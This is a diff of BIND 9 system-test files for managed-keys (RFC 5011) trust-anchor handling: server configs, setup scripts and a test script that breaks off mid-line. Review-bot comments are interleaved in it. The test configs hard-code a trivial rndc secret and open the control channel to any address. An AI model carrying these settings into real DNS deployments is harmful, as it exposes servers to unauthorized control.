+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS5
+
+options {
+ query-source address 10.53.0.5;
+ notify-source 10.53.0.5;
+ transfer-source 10.53.0.5;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.5; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify no;
+ dnssec-validation auto;
+ bindkeys-file "managed.conf";
+ servfail-ttl 0;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "foo" {
+ type primary;
+ file "foo.db";
+};
+
+include "island.conf";
+include "private.conf";
diff --git a/bin/tests/system/mkeys/ns5/named1.args b/bin/tests/system/mkeys/ns5/named1.args
new file mode 100644
index 0000000..c4c8a55
--- /dev/null
+++ b/bin/tests/system/mkeys/ns5/named1.args
@@ -0,0 +1 @@
+-m record,size,mctx -c named.conf -d 99 -X named.lock -g -T maxcachesize=2097152
diff --git a/bin/tests/system/mkeys/ns5/named2.args b/bin/tests/system/mkeys/ns5/named2.args
new file mode 100644
index 0000000..3fd830a
--- /dev/null
+++ b/bin/tests/system/mkeys/ns5/named2.args
@@ -0,0 +1 @@
+-m record,size,mctx -c named.conf -d 99 -X named.lock -g -T maxcachesize=2097152 -T mkeytimers=2/20/40
diff --git a/bin/tests/system/mkeys/ns6/named.args b/bin/tests/system/mkeys/ns6/named.args
new file mode 100644
index 0000000..65a8fca
--- /dev/null
+++ b/bin/tests/system/mkeys/ns6/named.args
@@ -0,0 +1 @@
+-m record,size,mctx -c named.conf -d 99 -X named.lock -g -T maxcachesize=2097152 -T mkeytimers=5/10/20
diff --git a/bin/tests/system/mkeys/ns6/named.conf.in b/bin/tests/system/mkeys/ns6/named.conf.in
new file mode 100644
index 0000000..ff8137a
--- /dev/null
+++ b/bin/tests/system/mkeys/ns6/named.conf.in
@@ -0,0 +1,44 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS6
+
+options {
+ query-source address 10.53.0.6;
+ notify-source 10.53.0.6;
+ transfer-source 10.53.0.6;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.6; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify no;
+ dnssec-validation yes;
+ trust-anchor-telemetry no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.6 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+include "managed.conf";
diff --git a/bin/tests/system/mkeys/ns6/setup.sh b/bin/tests/system/mkeys/ns6/setup.sh
new file mode 100644
index 0000000..1bfdc7f
--- /dev/null
+++ b/bin/tests/system/mkeys/ns6/setup.sh
@@ -0,0 +1,34 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+zone=.
+zonefile=root.db
+
+# a key for a trust island
+islandkey=$($KEYGEN -a ${DEFAULT_ALGORITHM} -qfk island.)
+
+# a key with unsupported algorithm
+unsupportedkey=Kunknown.+255+00000
+cp unsupported-managed.key "${unsupportedkey}.key"
+
+# root key
+rootkey=$(cat ../ns1/managed.key)
+cp "../ns1/${rootkey}.key" .
+
+# Configure the resolving server with an initializing key.
+# (We use key-format trust anchors here because otherwise the
+# unsupported algorithm test won't work.)
+keyfile_to_initial_keys $unsupportedkey $islandkey $rootkey > managed.conf
diff --git a/bin/tests/system/mkeys/ns6/unsupported-managed.key b/bin/tests/system/mkeys/ns6/unsupported-managed.key
new file mode 100644
index 0000000..be872a0
--- /dev/null
+++ b/bin/tests/system/mkeys/ns6/unsupported-managed.key
@@ -0,0 +1 @@
+unsupported. IN DNSKEY 257 3 255 BOOVAhiJDPqhfU7+yGXjhetrtC/rtjmwO1yo52BUHUd8R4hQ/ZPdYCVvQlvNkRxDblPkFM5YRXkesS30pJSoNYrg+djbMNumJrLG+lbhFIc/ahTjlYOxb1zm2z00ubHju/1uGBifiRvKWSK0Vr0u6NtS4PKZfsnXt+piSHiRAHSfkjGHwqPYYKh9EUW12kJmIzlMaM6WYl+gJOvL+f8VqNLtvsMPT6OPK/3h/Dnfnxyeudp/jzAnNDDiTgX2XfzIXB4UwxtzIOGaHLnprpNf3zoBm0kyaEdSQQ/qKkpCOqjBasYEHRjVz3RncPUkdLr7PQuPBfFDr3SUMMJqufJrO4IJjtD4cCBT7K1i39Jg471nEzU1vkPzxF+Rw1QHT4nZaXbltf3BEZGS4Knoe9XPwi5KjGW6
diff --git a/bin/tests/system/mkeys/ns7/named.conf.in b/bin/tests/system/mkeys/ns7/named.conf.in
new file mode 100644
index 0000000..2c0d69e
--- /dev/null
+++ b/bin/tests/system/mkeys/ns7/named.conf.in
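Review bot: `zone=.` and `zonefile=root.db` are assigned near the top of ns6/setup.sh but never read anywhere in the 34-line file, which suggests they were carried over from a sign.sh template; they can be dropped. The last line passes `$unsupportedkey $islandkey $rootkey` unquoted to `keyfile_to_initial_keys`, and quoting each argument (`"$unsupportedkey" "$islandkey" "$rootkey"`) would match the quoting already used on the two `cp` commands. The script also needs `../ns1/managed.key` to exist already, presumably written by ns1/sign.sh, so a comment such as `# requires ns1/sign.sh to have run first` above `rootkey=` would document the ordering that mkeys/setup.sh relies on.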
@@ -0,0 +1,51 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS7
+
+options {
+ query-source address 10.53.0.7;
+ notify-source 10.53.0.7;
+ transfer-source 10.53.0.7;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.7; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify no;
+ dnssec-validation auto;
+ bindkeys-file "managed.conf";
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.7 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+view view1 {
+ zone "." {
+ type hint;
+ file "../../common/root.hint";
+ };
+};
+
+view view2 {
+ zone "." {
+ type hint;
+ file "../../common/root.hint";
+ };
+};
diff --git a/bin/tests/system/mkeys/setup.sh b/bin/tests/system/mkeys/setup.sh
new file mode 100644
index 0000000..b110094
--- /dev/null
+++ b/bin/tests/system/mkeys/setup.sh
@@ -0,0 +1,45 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+
+export ALGORITHM_SET="ecc_default"
+. $SYSTEMTESTTOP/conf.sh
+
+# Ensure the selected algorithm set is okay.
+if [ "$ALGORITHM_SET" = "error" ]; then
+ echofail "Algorithm selection failed." >&2
+ exit 1
+fi
+
+copy_setports ns1/named1.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+copy_setports ns4/named.conf.in ns4/named.conf
+copy_setports ns5/named.conf.in ns5/named.conf
+copy_setports ns6/named.conf.in ns6/named.conf
+copy_setports ns7/named.conf.in ns7/named.conf
+
+cp ns5/named1.args ns5/named.args
+
+( cd ns1 && $SHELL sign.sh )
+( cd ns4 && $SHELL sign.sh )
+( cd ns6 && $SHELL setup.sh )
+
+cp ns2/managed.conf ns2/managed1.conf
+
+cd ns4
+mkdir nope
+touch nope/managed-keys.bind
+touch nope/managed.keys.bind.jnl
+chmod 444 nope/*
diff --git a/bin/tests/system/mkeys/tests.sh b/bin/tests/system/mkeys/tests.sh
new file mode 100644
index 0000000..5999e21
--- /dev/null
+++ b/bin/tests/system/mkeys/tests.sh
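Review bot: In the final block of mkeys/setup.sh, `touch nope/managed.keys.bind.jnl` spells the journal name with a dot where the line before it uses a hyphen (`managed-keys.bind`), so this looks like a typo and the read-only placeholder is probably not the file named would use as its journal; `touch nope/managed-keys.bind.jnl` is likely what was meant. The block also carries no comment, and because `chmod 444 nope/*` changes only the two files and not the `nope` directory itself, the mechanism that makes ns4's managed-keys initialization fail is worth stating, e.g. `# ns4: make the managed-keys files read-only so key initialization cannot complete`. File modes do not restrict root, so the dependent ns4 check in tests.sh may behave differently if the suite is ever run as root.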
@@ -0,0 +1,885 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -e + +SYSTEMTESTTOP=.. +export ALGORITHM_SET="ecc_default" +#shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +dig_with_opts() ( + "$DIG" +tcp +noadd +nosea +nostat +nocmd +dnssec -p "${PORT}" "$@" +) + +delv_with_opts() ( + "$DELV" -a ns1/trusted.conf -p "${PORT}" "$@" +) + +rndccmd() ( + "$RNDC" -c "$SYSTEMTESTTOP/common/rndc.conf" -p "${CONTROLPORT}" -s "$@" +) + +mkeys_reconfig_on() ( + nsidx=$1 + rndccmd "10.53.0.${nsidx}" reconfig . | sed "s/^/ns${nsidx} /" | cat_i +) + +mkeys_reload_on() ( + nsidx=$1 + nextpart "ns${nsidx}"/named.run > /dev/null + rndc_reload "ns${nsidx}" "10.53.0.${nsidx}" + wait_for_log 20 "loaded serial" "ns${nsidx}"/named.run || return 1 +) + +mkeys_loadkeys_on() ( + nsidx=$1 + nextpart "ns${nsidx}"/named.run > /dev/null + rndccmd "10.53.0.${nsidx}" loadkeys . 
| sed "s/^/ns${nsidx} /" | cat_i + wait_for_log 20 "next key event" "ns${nsidx}"/named.run || return 1 +) + +mkeys_refresh_on() ( + nsidx=$1 + nextpart "ns${nsidx}"/named.run > /dev/null + rndccmd "10.53.0.${nsidx}" managed-keys refresh | sed "s/^/ns${nsidx} /" | cat_i + wait_for_log 20 "Returned from key fetch in keyfetch_done()" "ns${nsidx}"/named.run || return 1 +) + +mkeys_sync_on() ( + # No race with mkeys_refresh_on() is possible as even if the latter + # returns immediately after the expected log message is written, the + # managed-keys zone is already locked and the command below calls + # dns_zone_flush(), which also attempts to take that zone's lock + nsidx=$1 + nextpart "ns${nsidx}"/named.run > /dev/null + rndccmd "10.53.0.${nsidx}" managed-keys sync | sed "s/^/ns${nsidx} /" | cat_i + wait_for_log 20 "dump_done" "ns${nsidx}"/named.run || return 1 +) + +mkeys_status_on() ( + # No race with mkeys_refresh_on() is possible as even if the latter + # returns immediately after the expected log message is written, the + # managed-keys zone is already locked and the command below calls + # mkey_status(), which in turn calls dns_zone_getrefreshkeytime(), + # which also attempts to take that zone's lock + nsidx=$1 + rndccmd "10.53.0.${nsidx}" managed-keys status +) + +mkeys_flush_on() ( + nsidx=$1 + rndccmd "10.53.0.${nsidx}" flush | sed "s/^/ns${nsidx} /" | cat_i +) + +mkeys_secroots_on() ( + nsidx=$1 + rndccmd "10.53.0.${nsidx}" secroots | sed "s/^/ns${nsidx} /" | cat_i +) + +original=$(cat ns1/managed.key) +originalid=$(cat ns1/managed.key.id) + +status=0 +n=1 + +rm -f dig.out.* + +echo_i "check for signed record ($n)" +ret=0 +dig_with_opts +norec example. 
@10.53.0.1 TXT > dig.out.ns1.test$n || ret=1 +grep "^example\.[[:space:]]*[0-9]*[[:space:]]*IN[[:space:]]*TXT[[:space:]]*\"This is a test\.\"" dig.out.ns1.test$n > /dev/null || ret=1 +grep "^example\.[[:space:]]*[0-9]*[[:space:]]*IN[[:space:]]*RRSIG[[:space:]]*TXT[[:space:]]" dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check positive validation with valid trust anchor ($n)" +ret=0 +dig_with_opts +noauth example. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1 +grep "example..*.RRSIG..*TXT" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +if [ -x "$DELV" ]; then + n=$((n+1)) + ret=0 + echo_i "check positive validation using delv ($n)" + delv_with_opts @10.53.0.1 txt example > delv.out$n || ret=1 + grep "; fully validated" delv.out$n > /dev/null || ret=1 # redundant + grep "example..*TXT.*This is a test" delv.out$n > /dev/null || ret=1 + grep "example..*.RRSIG..*TXT" delv.out$n > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +fi + +n=$((n+1)) +echo_i "check for failed validation due to wrong key in managed-keys ($n)" +ret=0 +dig_with_opts +noauth example. @10.53.0.3 txt > dig.out.ns3.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null && ret=1 +grep "example..*.RRSIG..*TXT" dig.out.ns3.test$n > /dev/null && ret=1 +grep "opcode: QUERY, status: SERVFAIL, id" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check new trust anchor can be added ($n)" +ret=0 +standby1=$($KEYGEN -a ${DEFAULT_ALGORITHM} -qfk -K ns1 .) 
+mkeys_loadkeys_on 1 || ret=1 +mkeys_refresh_on 2 || ret=1 +mkeys_status_on 2 > rndc.out.$n 2>&1 || ret=1 +# there should be two keys listed now +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# two lines indicating trust status +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# one indicates current trust +count=$(grep -c "trusted since" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# one indicates pending trust +count=$(grep -c "trust pending" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check new trust anchor can't be added with bad initial key ($n)" +ret=0 +mkeys_refresh_on 3 || ret=1 +mkeys_status_on 3 > rndc.out.$n 2>&1 || ret=1 +# there should be one key listed now +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# one line indicating trust status +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# ... and the key is not trusted +count=$(grep -c "no trust" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "remove untrusted standby key, check timer restarts ($n)" +ret=0 +mkeys_sync_on 2 || ret=1 +t1=$(grep "trust pending" ns2/managed-keys.bind) || true +$SETTIME -D now -K ns1 "$standby1" > /dev/null +mkeys_loadkeys_on 1 || ret=1 +# Less than a second may have passed since the last time ns2 received a +# ./DNSKEY response from ns1. Ensure keys are refreshed at a different +# timestamp to prevent false negatives caused by the acceptance timer getting +# reset to the same timestamp. 
+sleep 1 +mkeys_refresh_on 2 || ret=1 +mkeys_sync_on 2 || ret=1 +t2=$(grep "trust pending" ns2/managed-keys.bind) || true +# trust pending date must be different +[ -n "$t2" ] || ret=1 +[ "$t1" = "$t2" ] && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +ret=0 +echo_i "restore untrusted standby key, revoke original key ($n)" +t1=$t2 +$SETTIME -D none -K ns1 "$standby1" > /dev/null +$SETTIME -R now -K ns1 "$original" > /dev/null +mkeys_loadkeys_on 1 || ret=1 +# Less than a second may have passed since the last time ns2 received a +# ./DNSKEY response from ns1. Ensure keys are refreshed at a different +# timestamp to prevent false negatives caused by the acceptance timer getting +# reset to the same timestamp. +sleep 1 +mkeys_refresh_on 2 || ret=1 +mkeys_sync_on 2 || ret=1 +mkeys_status_on 2 > rndc.out.$n 2>&1 || ret=1 +# two keys listed +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# two lines indicating trust status +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# trust is revoked +count=$(grep -c "trust revoked" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# removal scheduled +count=$(grep -c "remove at" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# trust is still pending on the standby key +count=$(grep -c "trust pending" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# pending date moved forward for the standby key +t2=$(grep "trust pending" ns2/managed-keys.bind) || true +[ -n "$t2" ] || ret=1 +[ "$t1" = "$t2" ] && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +ret=0 +echo_i "refresh managed-keys, ensure same result ($n)" +t1=$t2 +# Less than a second may have passed since the last time ns2 received a +# ./DNSKEY response from ns1. Ensure keys are refreshed at a different +# timestamp to prevent false negatives caused by the acceptance timer getting +# reset to the same timestamp. 
+sleep 1 +mkeys_refresh_on 2 || ret=1 +mkeys_sync_on 2 || ret=1 +mkeys_status_on 2 > rndc.out.$n 2>&1 || ret=1 +# two keys listed +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# two lines indicating trust status +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# trust is revoked +count=$(grep -c "trust revoked" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# removal scheduled +count=$(grep -c "remove at" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# trust is still pending on the standby key +count=$(grep -c "trust pending" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# pending date moved forward for the standby key +t2=$(grep "trust pending" ns2/managed-keys.bind) || true +[ -n "$t2" ] || ret=1 +[ "$t1" = "$t2" ] && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +ret=0 +echo_i "restore revoked key, ensure same result ($n)" +t1=$t2 +$SETTIME -R none -D now -K ns1 "$original" > /dev/null +mkeys_loadkeys_on 1 || ret=1 +$SETTIME -D none -K ns1 "$original" > /dev/null +mkeys_loadkeys_on 1 || ret=1 +# Less than a second may have passed since the last time ns2 received a +# ./DNSKEY response from ns1. Ensure keys are refreshed at a different +# timestamp to prevent false negatives caused by the acceptance timer getting +# reset to the same timestamp. 
+sleep 1 +mkeys_refresh_on 2 || ret=1 +mkeys_sync_on 2 || ret=1 +mkeys_status_on 2 > rndc.out.$n 2>&1 || ret=1 +# two keys listed +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# two lines indicating trust status +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# trust is revoked +count=$(grep -c "trust revoked" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# removal scheduled +count=$(grep -c "remove at" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# trust is still pending on the standby key +count=$(grep -c "trust pending" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# pending date moved forward for the standby key +t2=$(grep "trust pending" ns2/managed-keys.bind) || true +[ -n "$t2" ] || ret=1 +[ "$t1" = "$t2" ] && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "reinitialize trust anchors, add second key to bind.keys" +stop_server --use-rndc --port "${CONTROLPORT}" ns2 +rm -f ns2/managed-keys.bind* +keyfile_to_initial_ds ns1/"$original" ns1/"$standby1" > ns2/managed.conf +nextpart ns2/named.run > /dev/null +start_server --noclean --restart --port "${PORT}" ns2 + +n=$((n+1)) +echo_i "check that no key from bind.keys is marked as an initializing key ($n)" +ret=0 +wait_for_log 20 "Returned from key fetch in keyfetch_done()" ns2/named.run || ret=1 +mkeys_secroots_on 2 || ret=1 +grep '; initializing' ns2/named.secroots > /dev/null 2>&1 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "reinitialize trust anchors, revert to one key in bind.keys" +stop_server --use-rndc --port "${CONTROLPORT}" ns2 +rm -f ns2/managed-keys.bind* +mv ns2/managed1.conf ns2/managed.conf +nextpart ns2/named.run > /dev/null +start_server --noclean --restart --port "${PORT}" ns2 + +n=$((n+1)) +echo_i "check that standby key is now trusted ($n)" +ret=0 +wait_for_log 20 "Returned from key fetch in keyfetch_done()" ns2/named.run || ret=1 
+mkeys_status_on 2 > rndc.out.$n 2>&1 || ret=1 +# two keys listed +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# two lines indicating trust status +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# both indicate current trust +count=$(grep -c "trusted since" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "revoke original key, add new standby ($n)" +ret=0 +standby2=$($KEYGEN -a ${DEFAULT_ALGORITHM} -qfk -K ns1 .) +$SETTIME -R now -K ns1 "$original" > /dev/null +mkeys_loadkeys_on 1 || ret=1 +mkeys_refresh_on 2 || ret=1 +mkeys_status_on 2 > rndc.out.$n 2>&1 || ret=1 +# three keys listed +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 3 ] || ret=1 +# one is revoked +count=$(grep -c "REVOKE" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# three lines indicating trust status +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 3 ] || ret=1 +# one indicates current trust +count=$(grep -c "trusted since" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# one indicates revoked trust +count=$(grep -c "trust revoked" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# one indicates trust pending +count=$(grep -c "trust pending" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +# removal scheduled +count=$(grep -c "remove at" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "revoke standby before it is trusted ($n)" +ret=0 +standby3=$($KEYGEN -a ${DEFAULT_ALGORITHM} -qfk -K ns1 .) 
+mkeys_loadkeys_on 1 || ret=1 +mkeys_refresh_on 2 || ret=1 +mkeys_status_on 2 > rndc.out.1.$n 2>&1 || ret=1 +# four keys listed +count=$(grep -c "keyid: " rndc.out.1.$n) || true +[ "$count" -eq 4 ] || { echo_i "keyid: count ($count) != 4"; ret=1; } +# one revoked +count=$(grep -c "trust revoked" rndc.out.1.$n) || true +[ "$count" -eq 1 ] || { echo_i "trust revoked count ($count) != 1"; ret=1; } +# two pending +count=$(grep -c "trust pending" rndc.out.1.$n) || true +[ "$count" -eq 2 ] || { echo_i "trust pending count ($count) != 2"; ret=1; } +$SETTIME -R now -K ns1 "$standby3" > /dev/null +mkeys_loadkeys_on 1 || ret=1 +mkeys_refresh_on 2 || ret=1 +mkeys_status_on 2 > rndc.out.2.$n 2>&1 || ret=1 +# now three keys listed +count=$(grep -c "keyid: " rndc.out.2.$n) || true +[ "$count" -eq 3 ] || { echo_i "keyid: count ($count) != 3"; ret=1; } +# one revoked +count=$(grep -c "trust revoked" rndc.out.2.$n) || true +[ "$count" -eq 1 ] || { echo_i "trust revoked count ($count) != 1"; ret=1; } +# one pending +count=$(grep -c "trust pending" rndc.out.2.$n) || true +[ "$count" -eq 1 ] || { echo_i "trust pending count ($count) != 1"; ret=1; } +$SETTIME -D now -K ns1 "$standby3" > /dev/null +mkeys_loadkeys_on 1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "wait 20 seconds for key add/remove holddowns to expire ($n)" +ret=0 +sleep 20 +mkeys_refresh_on 2 || ret=1 +mkeys_status_on 2 > rndc.out.$n 2>&1 || ret=1 +# two keys listed +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# none revoked +count=$(grep -c "REVOKE" rndc.out.$n) || true +[ "$count" -eq 0 ] || ret=1 +# two lines indicating trust status +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# both indicate current trust +count=$(grep -c "trusted since" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "revoke all keys, confirm 
roll to insecure ($n)" +ret=0 +$SETTIME -D now -K ns1 "$original" > /dev/null +$SETTIME -R now -K ns1 "$standby1" > /dev/null +$SETTIME -R now -K ns1 "$standby2" > /dev/null +mkeys_loadkeys_on 1 || ret=1 +mkeys_refresh_on 2 || ret=1 +mkeys_status_on 2 > rndc.out.$n 2>&1 || ret=1 +# two keys listed +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# both revoked +count=$(grep -c "REVOKE" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# two lines indicating trust status +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# both indicate trust revoked +count=$(grep -c "trust revoked" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# both have removal scheduled +count=$(grep -c "remove at" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check for insecure response ($n)" +ret=0 +mkeys_refresh_on 2 || ret=1 +dig_with_opts +noauth example. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null && ret=1 +grep "example..*.RRSIG..*TXT" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "reset the root server ($n)" +ret=0 +$SETTIME -D none -R none -K ns1 "$original" > /dev/null +$SETTIME -D now -K ns1 "$standby1" > /dev/null +$SETTIME -D now -K ns1 "$standby2" > /dev/null +sleep 1 # ensure modification time changes +$SIGNER -Sg -K ns1 -N unixtime -o . 
ns1/root.db > /dev/null 2>/dev/null +copy_setports ns1/named2.conf.in ns1/named.conf +rm -f ns1/root.db.signed.jnl +mkeys_reconfig_on 1 || ret=1 +mkeys_reload_on 1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "reinitialize trust anchors" +stop_server --use-rndc --port "${CONTROLPORT}" ns2 +rm -f ns2/managed-keys.bind* +nextpart ns2/named.run > /dev/null +start_server --noclean --restart --port "${PORT}" ns2 + +n=$((n+1)) +echo_i "check positive validation ($n)" +ret=0 +wait_for_log 20 "Returned from key fetch in keyfetch_done()" ns2/named.run || ret=1 +dig_with_opts +noauth example. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1 +grep "example..*.RRSIG..*TXT" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "revoke key with bad signature, check revocation is ignored ($n)" +ret=0 +revoked=$($REVOKE -K ns1 "$original") +rkeyid=$(keyfile_to_key_id "$revoked") +rm -f ns1/root.db.signed.jnl +# We need to activate at least one valid DNSKEY to prevent dnssec-signzone from +# failing. Alternatively, we could use -P to disable post-sign verification, +# but we actually do want post-sign verification to happen to ensure the zone +# is correct before we break it on purpose. +$SETTIME -R none -D none -K ns1 "$standby1" > /dev/null +$SIGNER -Sg -K ns1 -N unixtime -O full -o . -f signer.out.$n ns1/root.db > /dev/null 2>/dev/null +cp -f ns1/root.db.signed ns1/root.db.tmp +BADSIG="SVn2tLDzpNX2rxR4xRceiCsiTqcWNKh7NQ0EQfCrVzp9WEmLw60sQ5kP 